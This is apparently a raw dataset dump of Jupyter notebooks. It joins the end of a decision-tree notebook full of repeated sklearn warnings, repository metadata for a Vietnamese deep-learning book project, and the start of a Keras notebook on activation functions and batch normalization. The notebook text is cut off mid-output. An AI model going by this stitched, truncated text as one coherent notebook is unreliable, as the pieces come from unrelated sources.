warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n" ] ], [ [ "# Visualize Decision Tree", "_____no_output_____" ] ], [ [ "my_data.columns", "_____no_output_____" ], [ "import matplotlib.pyplot as plt \nimport graphviz\nfig = plt.figure(figsize=(25,20))\ndata = tree.export_graphviz(model, \n feature_names=my_data.columns[0:5], \n class_names=my_data.Drug.unique().tolist(),\n filled=True)\ngraph = graphviz.Source(data, format=\"png\") \ngraph", "_____no_output_____" ], [ "!pip install graphviz", "Collecting graphviz\n Downloading https://files.pythonhosted.org/packages/62/dc/9dd6a6b9b8977248e165e075b109eea6e8eac71faa28ca378c3d98e54fbe/graphviz-0.14.1-py2.py3-none-any.whl\nInstalling collected packages: graphviz\nSuccessfully installed graphviz-0.14.1\n" ] ], [ [ "<hr>\n\n<div id=\"visualization\">\n <h2>Visualization</h2>\n Lets visualize the tree\n</div>\n", "_____no_output_____" ] ], [ [ "# Notice: You might need to uncomment and install the pydotplus and graphviz libraries if you have not installed these before\n# !conda install -c conda-forge pydotplus -y\n# !conda install -c conda-forge python-graphviz -y", "_____no_output_____" ], [ "from sklearn.externals.six import StringIO\nimport pydotplus\nimport matplotlib.image as mpimg\nfrom sklearn import tree\n%matplotlib inline ", "_____no_output_____" ], [ "dot_data = StringIO()\nfilename = \"drugtree.png\"\nfeatureNames = my_data.columns[0:5]\ntargetNames = my_data[\"Drug\"].unique().tolist()\nout=tree.export_graphviz(drugTree,feature_names=featureNames, out_file=dot_data, class_names= np.unique(y_trainset), filled=True, special_characters=True,rotate=False) \ngraph = pydotplus.graph_from_dot_data(dot_data.getvalue()) \ngraph.write_png(filename)\nimg = mpimg.imread(filename)\nplt.figure(figsize=(100, 200))\nplt.imshow(img,interpolation='nearest')", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ] ]
e72e3d1d31964735f478d607458627509795fadc
390,761
ipynb
Jupyter Notebook
11_training_deep_neural_networks.ipynb
mlbvn/d2l-book-vn
3d02753661e11f18172d1e735e7c0e5b1ca08d58
[ "Apache-2.0" ]
139
2021-01-09T00:50:46.000Z
2022-03-04T07:35:41.000Z
11_training_deep_neural_networks.ipynb
mlbvn/d2l-book-vn
3d02753661e11f18172d1e735e7c0e5b1ca08d58
[ "Apache-2.0" ]
17
2021-07-10T12:34:28.000Z
2022-03-12T05:27:33.000Z
11_training_deep_neural_networks.ipynb
mlbvn/d2l-book-vn
3d02753661e11f18172d1e735e7c0e5b1ca08d58
[ "Apache-2.0" ]
77
2021-01-14T23:08:19.000Z
2022-02-24T07:21:04.000Z
81.903375
32,570
0.740087
[ [ [ "**Chapter 11 – Training Deep Neural Networks**", "_____no_output_____" ], [ "_This notebook contains all the sample code and solutions to the exercises in chapter 11._", "_____no_output_____" ], [ "<table align=\"left\">\n <td>\n <a href=\"https://colab.research.google.com/github/ageron/handson-ml2/blob/master/11_training_deep_neural_networks.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>\n </td>\n <td>\n <a target=\"_blank\" href=\"https://kaggle.com/kernels/welcome?src=https://github.com/ageron/handson-ml2/blob/add-kaggle-badge/11_training_deep_neural_networks.ipynb\"><img src=\"https://kaggle.com/static/images/open-in-kaggle.svg\" /></a>\n </td>\n</table>", "_____no_output_____" ], [ "# Setup", "_____no_output_____" ], [ "Đầu tiên hãy nhập một vài mô-đun thông dụng, đảm bảo rằng Matplotlib sẽ vẽ đồ thị ngay trong notebook, và chuẩn bị một hàm để lưu đồ thị. Ta cũng kiểm tra xem Python phiên bản từ 3.5 trở lên đã được cài đặt hay chưa (mặc dù Python 2.x vẫn có thể hoạt động, phiên bản này đã bị deprecated nên chúng tôi rất khuyến khích việc sử dụng Python 3), cũng như Scikit-Learn ≥ 0.20.", "_____no_output_____" ] ], [ [ "# Python ≥3.5 is required\nimport sys\nassert sys.version_info >= (3, 5)\n\n# Scikit-Learn ≥0.20 is required\nimport sklearn\nassert sklearn.__version__ >= \"0.20\"\n\ntry:\n # %tensorflow_version only exists in Colab.\n %tensorflow_version 2.x\nexcept Exception:\n pass\n\n# TensorFlow ≥2.0 is required\nimport tensorflow as tf\nfrom tensorflow import keras\nassert tf.__version__ >= \"2.0\"\n\n%load_ext tensorboard\n\n# Common imports\nimport numpy as np\nimport os\n\n# to make this notebook's output stable across runs\nnp.random.seed(42)\n\n# To plot pretty figures\n%matplotlib inline\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\n# Where to save the figures\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"deep\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\nos.makedirs(IMAGES_PATH, exist_ok=True)\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)", "_____no_output_____" ] ], [ [ "# Vanishing/Exploding Gradients Problem", "_____no_output_____" ] ], [ [ "def logit(z):\n return 1 / (1 + np.exp(-z))", "_____no_output_____" ], [ "z = np.linspace(-5, 5, 200)\n\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([-5, 5], [1, 1], 'k--')\nplt.plot([0, 0], [-0.2, 1.2], 'k-')\nplt.plot([-5, 5], [-3/4, 7/4], 'g--')\nplt.plot(z, logit(z), \"b-\", linewidth=2)\nprops = dict(facecolor='black', shrink=0.1)\nplt.annotate('Saturating', xytext=(3.5, 0.7), xy=(5, 1), arrowprops=props, fontsize=14, ha=\"center\")\nplt.annotate('Saturating', xytext=(-3.5, 0.3), xy=(-5, 0), arrowprops=props, fontsize=14, ha=\"center\")\nplt.annotate('Linear', xytext=(2, 0.2), xy=(0, 0.5), arrowprops=props, fontsize=14, ha=\"center\")\nplt.grid(True)\nplt.title(\"Sigmoid activation function\", fontsize=14)\nplt.axis([-5, 5, -0.2, 1.2])\n\nsave_fig(\"sigmoid_saturation_plot\")\nplt.show()", "Saving figure sigmoid_saturation_plot\n" ] ], [ [ "## Xavier and He Initialization", "_____no_output_____" ] ], [ [ "[name for name in dir(keras.initializers) if not name.startswith(\"_\")]", "_____no_output_____" ], [ "keras.layers.Dense(10, activation=\"relu\", kernel_initializer=\"he_normal\")", "_____no_output_____" ], [ "init = keras.initializers.VarianceScaling(scale=2., mode='fan_avg',\n distribution='uniform')\nkeras.layers.Dense(10, activation=\"relu\", kernel_initializer=init)", "_____no_output_____" ] ], [ [ "## Nonsaturating Activation Functions", "_____no_output_____" ], [ "### Leaky ReLU", "_____no_output_____" ] ], [ [ "def leaky_relu(z, alpha=0.01):\n return np.maximum(alpha*z, z)", "_____no_output_____" ], [ "plt.plot(z, leaky_relu(z, 0.05), \"b-\", linewidth=2)\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([0, 0], [-0.5, 4.2], 'k-')\nplt.grid(True)\nprops = dict(facecolor='black', shrink=0.1)\nplt.annotate('Leak', xytext=(-3.5, 0.5), xy=(-5, -0.2), arrowprops=props, fontsize=14, ha=\"center\")\nplt.title(\"Leaky ReLU activation function\", fontsize=14)\nplt.axis([-5, 5, -0.5, 4.2])\n\nsave_fig(\"leaky_relu_plot\")\nplt.show()", "Saving figure leaky_relu_plot\n" ], [ "[m for m in dir(keras.activations) if not m.startswith(\"_\")]", "_____no_output_____" ], [ "[m for m in dir(keras.layers) if \"relu\" in m.lower()]", "_____no_output_____" ] ], [ [ "Let's train a neural network on Fashion MNIST using the Leaky ReLU:", "_____no_output_____" ] ], [ [ "(X_train_full, y_train_full), (X_test, y_test) = keras.datasets.fashion_mnist.load_data()\nX_train_full = X_train_full / 255.0\nX_test = X_test / 255.0\nX_valid, X_train = X_train_full[:5000], X_train_full[5000:]\ny_valid, y_train = y_train_full[:5000], y_train_full[5000:]", "_____no_output_____" ], [ "tf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, kernel_initializer=\"he_normal\"),\n keras.layers.LeakyReLU(),\n keras.layers.Dense(100, kernel_initializer=\"he_normal\"),\n keras.layers.LeakyReLU(),\n keras.layers.Dense(10, activation=\"softmax\")\n])", "_____no_output_____" ], [ "model.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "history = model.fit(X_train, y_train, epochs=10,\n validation_data=(X_valid, y_valid))", "Epoch 1/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 1.6314 - accuracy: 0.5054 - val_loss: 0.8886 - val_accuracy: 0.7160\nEpoch 2/10\n1719/1719 [==============================] - 2s 892us/step - loss: 0.8416 - accuracy: 0.7247 - val_loss: 0.7130 - val_accuracy: 0.7656\nEpoch 3/10\n1719/1719 [==============================] - 2s 879us/step - loss: 0.7053 - accuracy: 0.7637 - val_loss: 0.6427 - val_accuracy: 0.7898\nEpoch 4/10\n1719/1719 [==============================] - 2s 883us/step - loss: 0.6325 - accuracy: 0.7908 - val_loss: 0.5900 - val_accuracy: 0.8066\nEpoch 5/10\n1719/1719 [==============================] - 2s 887us/step - loss: 0.5992 - accuracy: 0.8021 - val_loss: 0.5582 - val_accuracy: 0.8200\nEpoch 6/10\n1719/1719 [==============================] - 2s 881us/step - loss: 0.5624 - accuracy: 0.8142 - val_loss: 0.5350 - val_accuracy: 0.8238\nEpoch 7/10\n1719/1719 [==============================] - 2s 892us/step - loss: 0.5379 - accuracy: 0.8217 - val_loss: 0.5157 - val_accuracy: 0.8304\nEpoch 8/10\n1719/1719 [==============================] - 2s 895us/step - loss: 0.5152 - accuracy: 0.8295 - val_loss: 0.5078 - val_accuracy: 0.8284\nEpoch 9/10\n1719/1719 [==============================] - 2s 911us/step - loss: 0.5100 - accuracy: 0.8268 - val_loss: 0.4895 - val_accuracy: 0.8390\nEpoch 10/10\n1719/1719 [==============================] - 2s 897us/step - loss: 0.4918 - accuracy: 0.8340 - val_loss: 0.4817 - val_accuracy: 0.8396\n" ] ], [ [ "Now let's try PReLU:", "_____no_output_____" ] ], [ [ "tf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, kernel_initializer=\"he_normal\"),\n keras.layers.PReLU(),\n keras.layers.Dense(100, kernel_initializer=\"he_normal\"),\n keras.layers.PReLU(),\n keras.layers.Dense(10, activation=\"softmax\")\n])", "_____no_output_____" ], [ "model.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "history = model.fit(X_train, y_train, epochs=10,\n validation_data=(X_valid, y_valid))", "Epoch 1/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 1.6969 - accuracy: 0.4974 - val_loss: 0.9255 - val_accuracy: 0.7186\nEpoch 2/10\n1719/1719 [==============================] - 2s 990us/step - loss: 0.8706 - accuracy: 0.7247 - val_loss: 0.7305 - val_accuracy: 0.7630\nEpoch 3/10\n1719/1719 [==============================] - 2s 980us/step - loss: 0.7211 - accuracy: 0.7621 - val_loss: 0.6564 - val_accuracy: 0.7882\nEpoch 4/10\n1719/1719 [==============================] - 2s 985us/step - loss: 0.6447 - accuracy: 0.7879 - val_loss: 0.6003 - val_accuracy: 0.8048\nEpoch 5/10\n1719/1719 [==============================] - 2s 967us/step - loss: 0.6077 - accuracy: 0.8004 - val_loss: 0.5656 - val_accuracy: 0.8182\nEpoch 6/10\n1719/1719 [==============================] - 2s 984us/step - loss: 0.5692 - accuracy: 0.8118 - val_loss: 0.5406 - val_accuracy: 0.8236\nEpoch 7/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5428 - accuracy: 0.8194 - val_loss: 0.5196 - val_accuracy: 0.8314\nEpoch 8/10\n1719/1719 [==============================] - 2s 983us/step - loss: 0.5193 - accuracy: 0.8284 - val_loss: 0.5113 - val_accuracy: 0.8316\nEpoch 9/10\n1719/1719 [==============================] - 2s 992us/step - loss: 0.5128 - accuracy: 0.8272 - val_loss: 0.4916 - val_accuracy: 0.8378\nEpoch 10/10\n1719/1719 [==============================] - 2s 988us/step - loss: 0.4941 - accuracy: 0.8314 - val_loss: 0.4826 - val_accuracy: 0.8398\n" ] ], [ [ "### ELU", "_____no_output_____" ] ], [ [ "def elu(z, alpha=1):\n return np.where(z < 0, alpha * (np.exp(z) - 1), z)", "_____no_output_____" ], [ "plt.plot(z, elu(z), \"b-\", linewidth=2)\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([-5, 5], [-1, -1], 'k--')\nplt.plot([0, 0], [-2.2, 3.2], 'k-')\nplt.grid(True)\nplt.title(r\"ELU activation function ($\\alpha=1$)\", fontsize=14)\nplt.axis([-5, 5, -2.2, 3.2])\n\nsave_fig(\"elu_plot\")\nplt.show()", "Saving figure elu_plot\n" ] ], [ [ "Implementing ELU in TensorFlow is trivial, just specify the activation function when building each layer:", "_____no_output_____" ] ], [ [ "keras.layers.Dense(10, activation=\"elu\")", "_____no_output_____" ] ], [ [ "### SELU", "_____no_output_____" ], [ "This activation function was proposed in this [great paper](https://arxiv.org/pdf/1706.02515.pdf) by Günter Klambauer, Thomas Unterthiner and Andreas Mayr, published in June 2017. During training, a neural network composed exclusively of a stack of dense layers using the SELU activation function and LeCun initialization will self-normalize: the output of each layer will tend to preserve the same mean and variance during training, which solves the vanishing/exploding gradients problem. As a result, this activation function outperforms the other activation functions very significantly for such neural nets, so you should really try it out. Unfortunately, the self-normalizing property of the SELU activation function is easily broken: you cannot use ℓ<sub>1</sub> or ℓ<sub>2</sub> regularization, regular dropout, max-norm, skip connections or other non-sequential topologies (so recurrent neural networks won't self-normalize). However, in practice it works quite well with sequential CNNs. If you break self-normalization, SELU will not necessarily outperform other activation functions.", "_____no_output_____" ] ], [ [ "from scipy.special import erfc\n\n# alpha and scale to self normalize with mean 0 and standard deviation 1\n# (see equation 14 in the paper):\nalpha_0_1 = -np.sqrt(2 / np.pi) / (erfc(1/np.sqrt(2)) * np.exp(1/2) - 1)\nscale_0_1 = (1 - erfc(1 / np.sqrt(2)) * np.sqrt(np.e)) * np.sqrt(2 * np.pi) * (2 * erfc(np.sqrt(2))*np.e**2 + np.pi*erfc(1/np.sqrt(2))**2*np.e - 2*(2+np.pi)*erfc(1/np.sqrt(2))*np.sqrt(np.e)+np.pi+2)**(-1/2)", "_____no_output_____" ], [ "def selu(z, scale=scale_0_1, alpha=alpha_0_1):\n return scale * elu(z, alpha)", "_____no_output_____" ], [ "plt.plot(z, selu(z), \"b-\", linewidth=2)\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([-5, 5], [-1.758, -1.758], 'k--')\nplt.plot([0, 0], [-2.2, 3.2], 'k-')\nplt.grid(True)\nplt.title(\"SELU activation function\", fontsize=14)\nplt.axis([-5, 5, -2.2, 3.2])\n\nsave_fig(\"selu_plot\")\nplt.show()", "Saving figure selu_plot\n" ] ], [ [ "By default, the SELU hyperparameters (`scale` and `alpha`) are tuned in such a way that the mean output of each neuron remains close to 0, and the standard deviation remains close to 1 (assuming the inputs are standardized with mean 0 and standard deviation 1 too). Using this activation function, even a 1,000 layer deep neural network preserves roughly mean 0 and standard deviation 1 across all layers, avoiding the exploding/vanishing gradients problem:", "_____no_output_____" ] ], [ [ "np.random.seed(42)\nZ = np.random.normal(size=(500, 100)) # standardized inputs\nfor layer in range(1000):\n W = np.random.normal(size=(100, 100), scale=np.sqrt(1 / 100)) # LeCun initialization\n Z = selu(np.dot(Z, W))\n means = np.mean(Z, axis=0).mean()\n stds = np.std(Z, axis=0).mean()\n if layer % 100 == 0:\n print(\"Layer {}: mean {:.2f}, std deviation {:.2f}\".format(layer, means, stds))", "Layer 0: mean -0.00, std deviation 1.00\nLayer 100: mean 0.02, std deviation 0.96\nLayer 200: mean 0.01, std deviation 0.90\nLayer 300: mean -0.02, std deviation 0.92\nLayer 400: mean 0.05, std deviation 0.89\nLayer 500: mean 0.01, std deviation 0.93\nLayer 600: mean 0.02, std deviation 0.92\nLayer 700: mean -0.02, std deviation 0.90\nLayer 800: mean 0.05, std deviation 0.83\nLayer 900: mean 0.02, std deviation 1.00\n" ] ], [ [ "Using SELU is easy:", "_____no_output_____" ] ], [ [ "keras.layers.Dense(10, activation=\"selu\",\n kernel_initializer=\"lecun_normal\")", "_____no_output_____" ] ], [ [ "Let's create a neural net for Fashion MNIST with 100 hidden layers, using the SELU activation function:", "_____no_output_____" ] ], [ [ "np.random.seed(42)\ntf.random.set_seed(42)", "_____no_output_____" ], [ "model = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[28, 28]))\nmodel.add(keras.layers.Dense(300, activation=\"selu\",\n kernel_initializer=\"lecun_normal\"))\nfor layer in range(99):\n model.add(keras.layers.Dense(100, activation=\"selu\",\n kernel_initializer=\"lecun_normal\"))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))", "_____no_output_____" ], [ "model.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ] ], [ [ "Now let's train it. Do not forget to scale the inputs to mean 0 and standard deviation 1:", "_____no_output_____" ] ], [ [ "pixel_means = X_train.mean(axis=0, keepdims=True)\npixel_stds = X_train.std(axis=0, keepdims=True)\nX_train_scaled = (X_train - pixel_means) / pixel_stds\nX_valid_scaled = (X_valid - pixel_means) / pixel_stds\nX_test_scaled = (X_test - pixel_means) / pixel_stds", "_____no_output_____" ], [ "history = model.fit(X_train_scaled, y_train, epochs=5,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/5\n1719/1719 [==============================] - 12s 6ms/step - loss: 1.3556 - accuracy: 0.4808 - val_loss: 0.7711 - val_accuracy: 0.6858\nEpoch 2/5\n1719/1719 [==============================] - 9s 5ms/step - loss: 0.7537 - accuracy: 0.7235 - val_loss: 0.7534 - val_accuracy: 0.7384\nEpoch 3/5\n1719/1719 [==============================] - 9s 5ms/step - loss: 0.7451 - accuracy: 0.7357 - val_loss: 0.5943 - val_accuracy: 0.7834\nEpoch 4/5\n1719/1719 [==============================] - 9s 5ms/step - loss: 0.5699 - accuracy: 0.7906 - val_loss: 0.5434 - val_accuracy: 0.8066\nEpoch 5/5\n1719/1719 [==============================] - 9s 5ms/step - loss: 0.5569 - accuracy: 0.8051 - val_loss: 0.4907 - val_accuracy: 0.8218\n" ] ], [ [ "Now look at what happens if we try to use the ReLU activation function instead:", "_____no_output_____" ] ], [ [ "np.random.seed(42)\ntf.random.set_seed(42)", "_____no_output_____" ], [ "model = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[28, 28]))\nmodel.add(keras.layers.Dense(300, activation=\"relu\", kernel_initializer=\"he_normal\"))\nfor layer in range(99):\n model.add(keras.layers.Dense(100, activation=\"relu\", kernel_initializer=\"he_normal\"))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))", "_____no_output_____" ], [ "model.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "history = model.fit(X_train_scaled, y_train, epochs=5,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/5\n1719/1719 [==============================] - 11s 5ms/step - loss: 2.0460 - accuracy: 0.1919 - val_loss: 1.5971 - val_accuracy: 0.3048\nEpoch 2/5\n1719/1719 [==============================] - 8s 5ms/step - loss: 1.2654 - accuracy: 0.4591 - val_loss: 0.9156 - val_accuracy: 0.6372\nEpoch 3/5\n1719/1719 [==============================] - 8s 5ms/step - loss: 0.9312 - accuracy: 0.6169 - val_loss: 0.8928 - val_accuracy: 0.6246\nEpoch 4/5\n1719/1719 [==============================] - 8s 5ms/step - loss: 0.8188 - accuracy: 0.6710 - val_loss: 0.6914 - val_accuracy: 0.7396\nEpoch 5/5\n1719/1719 [==============================] - 8s 5ms/step - loss: 0.7288 - accuracy: 0.7152 - val_loss: 0.6638 - val_accuracy: 0.7380\n" ] ], [ [ "Not great at all, we suffered from the vanishing/exploding gradients problem.", "_____no_output_____" ], [ "# Batch Normalization", "_____no_output_____" ] ], [ [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.BatchNormalization(),\n keras.layers.Dense(300, activation=\"relu\"),\n keras.layers.BatchNormalization(),\n keras.layers.Dense(100, activation=\"relu\"),\n keras.layers.BatchNormalization(),\n keras.layers.Dense(10, activation=\"softmax\")\n])", "_____no_output_____" ], [ "model.summary()", "Model: \"sequential_4\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nflatten_4 (Flatten) (None, 784) 0 \n_________________________________________________________________\nbatch_normalization (BatchNo (None, 784) 3136 \n_________________________________________________________________\ndense_212 (Dense) (None, 300) 235500 \n_________________________________________________________________\nbatch_normalization_1 (Batch (None, 300) 1200 \n_________________________________________________________________\ndense_213 (Dense) (None, 100) 30100 \n_________________________________________________________________\nbatch_normalization_2 (Batch (None, 100) 400 